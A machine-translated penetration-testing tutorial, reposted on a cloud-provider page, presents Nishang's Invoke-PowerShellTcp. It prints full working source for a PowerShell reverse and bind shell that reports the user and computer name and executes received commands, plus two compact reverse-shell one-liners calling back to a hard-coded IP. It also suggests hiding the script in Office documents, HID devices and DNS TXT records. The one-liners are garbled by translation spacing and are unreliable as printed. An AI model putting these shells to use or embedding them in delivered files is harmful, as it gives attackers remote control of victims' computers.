One week PowerShell script Day 1: TCP interactive PowerShell script

Source: Internet
Author: User
Tags getstream kali linux

One week PowerShell script Day 1: TCP interactive PowerShell script

PowerShell is a common tool for penetration testers. With the close integration of Windows systems, this allows us to do a variety of interesting things. other hackers who use PowerShell and I have spent a lot of time on PowerShell programming.
However, during my lectures and training, I found that many hackers and defenders do not know what PowerShell can do and how convenient PowerShell is. At the same time, I also met many colleagues who dismissed PowerShell only because it came from Microsoft. To cultivate and spread PowerShell in the industry, I decided to start a one-week PowerShell script tutorial.
Day 1-TCP interactive PowerShell script
Day 2-UDP interactive PowerShell script
Day 3-HTTP/HTTPS interactive PowerShell script
Day 4-WMI interactive PowerShell script
Day 5-ICMP and DNS interactive PowerShell scripts
Not to mention, start the first day of the course.
Day 1: TCP interactive PowerShell script
Let's start with a reverse shell. This great script was submitted by Ben Turner (@ benpturner) and Dave hard (@ davehardy20. How to use this script using metasploit is described in their article. After removing some code from that script and modifying other things, it is the Invoke-PowerShellTcp I provide. This script can provide active or passive connection PowerShell. The current source code is as follows (excluding the help documentation ):
 

function Invoke-PowerShellTcp{    [CmdletBinding(DefaultParameterSetName="reverse")] Param(        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]        [String]        $IPAddress,        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]        [Int]        $Port,        [Parameter(ParameterSetName="reverse")]        [Switch]        $Reverse,        [Parameter(ParameterSetName="bind")]        [Switch]        $Bind    )    #Connect back if the reverse switch is used.    if ($Reverse)    {        $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)    }    #Bind to the provided port if Bind switch is used.    if ($Bind)    {        $listener = [System.Net.Sockets.TcpListener]$Port        $listener.start()           $client = $listener.AcceptTcpClient()    }    $stream = $client.GetStream()    [byte[]]$bytes = 0..255|%{0}    #Send back current username and computername    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")    $stream.Write($sendbytes,0,$sendbytes.Length)    #Show an interactive PowerShell prompt    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')    $stream.Write($sendbytes,0,$sendbytes.Length)    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)    {        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding        $data = $EncodedText.GetString($bytes,0, $i)        #Execute the command on the target.        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '        $x = ($error[0] | Out-String)        $error.clear()        $sendback2 = $sendback2 + $x        #Return the results        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)        $stream.Write($sendbyte,0,$sendbyte.Length)        $stream.Flush()     }    $client.Close()    $listener.Stop()}
You can find: https://github.com/samratashok/nishang/tree/master/Shells under the Shells directory of Nishang
The following shows how to run a listener on Kali Linux:

You can also run a listener on a Windows machine. Use powercat:

Use Invoke-PowerShellTcp for active connection:

Interactive PowerShell can help us solve problems in many cases. A good example is to obtain the user's plaintext password on Windows8.1 and Server 2012. In this case, interactive PowerShell must be used.
Note that we can also use powercat.

The listener you choose depends on your situation.
If you have carefully read the Invoke-PowerShellTcp source code, you will find that the source code is relatively short, so it can be used with other attack technologies, such: works with Microsoft MS Office documents, personalized interface devices (see Kautilya), devices to be downloaded, and dns txt records. Using a short script in these scenarios is a good choice. In fact, if you remove the error processing and formatted user input code, it can also be shorter. The following is the Invoke-PowerShellTcpOneLine:
$ Client = New-Object System. net. sockets. TCPClient ("192.168.254.1", 4444); $ stream = $ client. getStream (); [byte [] $ bytes = 0 .. 255 | % {0}; while ($ I = $ stream. read ($ bytes, 0, $ bytes. length)-ne 0) {; $ data = (New-Object-TypeName System. text. ASCIIEncoding ). getString ($ bytes, 0, $ I); $ sendback = (iex $ data 2> & 1 | Out-String ); $ sendback2 = $ sendback + "PS" + (pwd ). path + ">"; $ sendbyte = ([text. encoding]: ASCII ). getBytes ($ sendback2); $ stream. write ($ sendbyte, 0, $ sendbyte. length); $ stream. flush ()}; $ client. close () If you do not need to display the output, the script can be shorter, almost as long as the two Weibo posts: # $ sm = (New-Object Net. sockets. TCPClient ("192.168.254.1", 55555 )). getStream (); [byte [] $ bt = 0 .. 255 | % {0}; while ($ I = $ sm. read ($ bt, 0, $ bt. length)-ne 0) {; $ d = (New-Object Text. ASCIIEncoding ). getString ($ bt, 0, $ I); $ st = ([text. encoding]: ASCII ). getBytes (iex $ d 2> & 1); $ sm. write ($ st, 0, $ st. length )}

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.